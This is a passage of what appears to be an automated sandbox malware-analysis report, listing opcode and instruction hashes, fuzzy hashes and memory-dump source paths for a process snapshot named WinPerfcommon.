                                                                  • Opcode ID: 13c0853ee24928f0cb7b9a91faab21e0b8893d78391b972d7313a6b2e1158b97
                                                                  • Instruction ID: 57dabf530fe163df50332a78522224934fa8337c9d555b25bd6d1e396247ebb4
                                                                  • Opcode Fuzzy Hash: 13c0853ee24928f0cb7b9a91faab21e0b8893d78391b972d7313a6b2e1158b97
                                                                  • Instruction Fuzzy Hash: 2001CC31E0D288DFE742BB2488001A97BB0EF92740F0441F3D444EB2D3DA386A44C784
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 23665159f78f381b8fbd0132ec6a48cb83ec413b65f62da415733afec9ada006
                                                                  • Instruction ID: 0b79be2ed7bb6f11570fbfe39a82ca22e63bad10def8f73b83430371d4c1a3e8
                                                                  • Opcode Fuzzy Hash: 23665159f78f381b8fbd0132ec6a48cb83ec413b65f62da415733afec9ada006
                                                                  • Instruction Fuzzy Hash: 4801DB70D0C999CFCB98EF58C464AB8BBB1FBA9350F0405A9C00ED7291DA356980CB44
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 711bb203eca7a8838e0349bd66f41666ff485e36e968a8e22b9439c65e1b674a
                                                                  • Instruction ID: bcb62d84c0f85a36e8355933d7c6a0acb14885240b616e815e41cd2078b5c90c
                                                                  • Opcode Fuzzy Hash: 711bb203eca7a8838e0349bd66f41666ff485e36e968a8e22b9439c65e1b674a
                                                                  • Instruction Fuzzy Hash: 2501FB3090895CCFCF99EF18C898BE8B7B0FBA8315F5401A9D40DE7291CA759AC1CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                  • Instruction ID: 10698a8de4f6294da7a8f2182ca481fffe26d9a74ee4397c9d96f1386dcd6fb3
                                                                  • Opcode Fuzzy Hash: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                  • Instruction Fuzzy Hash: A701123091C41E8FEB65FB14D8417F873A1FBA8751F5040BAD85EE32D2EF2879854A49
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12d2bb01f66e5eaa197e6fc96b632be0c4a7b5db3dbf6f2ca24c84462e63a2b0
                                                                  • Instruction ID: c638fbd816b8416099eee0a33bef4845c3b850e494117df034c3d5162113d73a
                                                                  • Opcode Fuzzy Hash: 12d2bb01f66e5eaa197e6fc96b632be0c4a7b5db3dbf6f2ca24c84462e63a2b0
                                                                  • Instruction Fuzzy Hash: 63017830D0D389DFE742BB6488445AA7BB0EFA2744F1441F3D845EB2D3DA386A448745
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4801783ea8a21e4c0b9f0987179f103bc6937ade6411744aab4edf4cc501eaad
                                                                  • Instruction ID: b9311d9723850b7660ba889d516fd3f9ae08abe8ebff70b21eac3847baeea908
                                                                  • Opcode Fuzzy Hash: 4801783ea8a21e4c0b9f0987179f103bc6937ade6411744aab4edf4cc501eaad
                                                                  • Instruction Fuzzy Hash: DEF0623184E2C59FD726EF7088515E57FB4EF47354F1900F6D445C70A2C66D2616C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e93e3de55a6e2fb9d54d4c60812d4aeecadbcbe73eb480b83dfddedb439855e7
                                                                  • Instruction ID: dc0d97da77edde882eec8513cce15f97dc3be7f05510be5356a3b4052a88b006
                                                                  • Opcode Fuzzy Hash: e93e3de55a6e2fb9d54d4c60812d4aeecadbcbe73eb480b83dfddedb439855e7
                                                                  • Instruction Fuzzy Hash: 3EF0C23184E3C69FD7129F7088115E9BFF4AF47254F1810FAD4458B0A2C62C5506C352
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0a6fd0f1e1d581362225282f48cfef63542912d1b31d9460e29ee8701f2c1a3
                                                                  • Instruction ID: e68f00ca2667169a98a8089062070c046db4be840c3a03b9a702efc50fda4fa0
                                                                  • Opcode Fuzzy Hash: c0a6fd0f1e1d581362225282f48cfef63542912d1b31d9460e29ee8701f2c1a3
                                                                  • Instruction Fuzzy Hash: 10F0963144D3C59FD3129F7098555A57FB4AF47214B0900E6E446CB0A2D62C1A16C761
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d6ebc5579eec9db870b331dfabd08f6463e24305d69d6b705250a8c025904ec6
                                                                  • Instruction ID: 867ded10bbe733e371fb543723d775ec9ada051e23dc0d7416ddba1cd3506e92
                                                                  • Opcode Fuzzy Hash: d6ebc5579eec9db870b331dfabd08f6463e24305d69d6b705250a8c025904ec6
                                                                  • Instruction Fuzzy Hash: 91F0E1309089198FDB55EF08C894EAAB3F1FBA8351F0041A9D40EE7390DB35AD45CF85
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9cee8117c47a62174028b59e3e6255082e17e33ee164445033b8c5b885e83e36
                                                                  • Instruction ID: 60e9f9be9b0ea166a7d578ff91eae7856016517a09c7d4b7c3319ec10dc051bf
                                                                  • Opcode Fuzzy Hash: 9cee8117c47a62174028b59e3e6255082e17e33ee164445033b8c5b885e83e36
                                                                  • Instruction Fuzzy Hash: DDF0B43190D5868EF7357E1495011F8E620EF4A3E5F606836C40E831C2CE2929418691
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 504b311779b8bfe959ef01a9381299f03388722dbcf03477fb862cad025012d7
                                                                  • Instruction ID: fa48fdf62ec04928c849a7bfcd04bdf5b1c62f6d44fef6a504616fa16385c0a3
                                                                  • Opcode Fuzzy Hash: 504b311779b8bfe959ef01a9381299f03388722dbcf03477fb862cad025012d7
                                                                  • Instruction Fuzzy Hash: F5E0223020DA49CFC702BB38CC944D17BA0EF06614FE910AED049D7266D3205869CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4a6db53464135a96032a607e07f823c7c3d6ae9f17ead2f3f633f20af33734a8
                                                                  • Instruction ID: ce867a3d251161be1350abc3ea83da331b2be9c5762f81b33d52908927818882
                                                                  • Opcode Fuzzy Hash: 4a6db53464135a96032a607e07f823c7c3d6ae9f17ead2f3f633f20af33734a8
                                                                  • Instruction Fuzzy Hash: BDE06531A0C5468EE761FF00D8507A87352DBDA3B0F145275C00D872C9DE3969824681
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                  • Instruction ID: aae9bcc5ddbe83a8d2480da5624d938a0615ab20430e0cf98c81cd4409ae9021
                                                                  • Opcode Fuzzy Hash: be0c33059f02bc6c5460181056d9ed3b6da67ebe8703d163f4431e8e073ce9c6
                                                                  • Instruction Fuzzy Hash: 84E01234A0D0164BF794B754C4407A92260DF94790F15407AED5EA33C6DE3CAE418B09
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5d005fac91cdb68f9ef86c7593f3fb93ae5fa515ac9ed183fda4f19fd83cd6f8
                                                                  • Instruction ID: 5182a03625d9d1f8322b0cc7bf7cfeb4f38824d4321cd3d437ff879356d8d52d
                                                                  • Opcode Fuzzy Hash: 5d005fac91cdb68f9ef86c7593f3fb93ae5fa515ac9ed183fda4f19fd83cd6f8
                                                                  • Instruction Fuzzy Hash: 77E0EC21E2D5520AF399B36848363B99181EBA5B94F4941BAA80EE72D3DE0C5884469A
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c6f9ccb9f6852bcb3c0f3204b6acf6cb8d5dcb5c787e45ec6ea705f6b3065d8
                                                                  • Instruction ID: 96b79f887c0238edcda7e8ec93c32e710c5cfa94b4023151d5cc5da49c31c355
                                                                  • Opcode Fuzzy Hash: 9c6f9ccb9f6852bcb3c0f3204b6acf6cb8d5dcb5c787e45ec6ea705f6b3065d8
                                                                  • Instruction Fuzzy Hash: 9CE0C231E0C7C24FF72B2A7008601796FD08F0B3C4B0918B2C0598A1C3D94828098622
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6aa28bd7a03a160e5cc4a0cb4c6d14203445803c140c172cad24f3d5f9d6f04e
                                                                  • Instruction ID: e5a3df85a7fee2918be2af77e55dcae786859636869e4807b23a190d48d2d5dd
                                                                  • Opcode Fuzzy Hash: 6aa28bd7a03a160e5cc4a0cb4c6d14203445803c140c172cad24f3d5f9d6f04e
                                                                  • Instruction Fuzzy Hash: C9D0A772D0C6C74FE7365A7804A4175DBD09F4F29874D0E79C4894B3C3ED8438568392
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac722e97edf49119d6f2223323b39f6d9a7dcdbbd9bfa0954a2acfcdf267815e
                                                                  • Instruction ID: 59dbda28bf680fc7d0d4185812916ee7bb9a36d84dcfdce682c40d3ef0890cdf
                                                                  • Opcode Fuzzy Hash: ac722e97edf49119d6f2223323b39f6d9a7dcdbbd9bfa0954a2acfcdf267815e
                                                                  • Instruction Fuzzy Hash: BBC08C21D1E40B08F490B3AE18020ACA1005BF4ED0FD00033CC0D601C3AE0D20D5018E
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ae6c92dcc6bb0d4fab5328cc4addbf46ec0257a1f268a4f9d158cc6c345c173b
                                                                  • Instruction ID: 078c070e8e3b06599b151b2ba240514f51810c4b7585bc52d13305f8bc45d0dd
                                                                  • Opcode Fuzzy Hash: ae6c92dcc6bb0d4fab5328cc4addbf46ec0257a1f268a4f9d158cc6c345c173b
                                                                  • Instruction Fuzzy Hash: DAB02B0570850545E7003A6C74800E4A341CF84030B500472CC05C038EEC1B48C10180
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                  • Instruction ID: e0acd4d7294105a89fa9f19f05122d822d44b7fd0b9cdf8978aa750188069a35
                                                                  • Opcode Fuzzy Hash: e37c9eec6782536c5558a0d5d5aa2fb9fd1c106da5083032bc0c1e53f1350889
                                                                  • Instruction Fuzzy Hash: 1FC08C305108088FC908FB28C88480833A0FB19200FC200A0E009C71B0E219DCC1C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd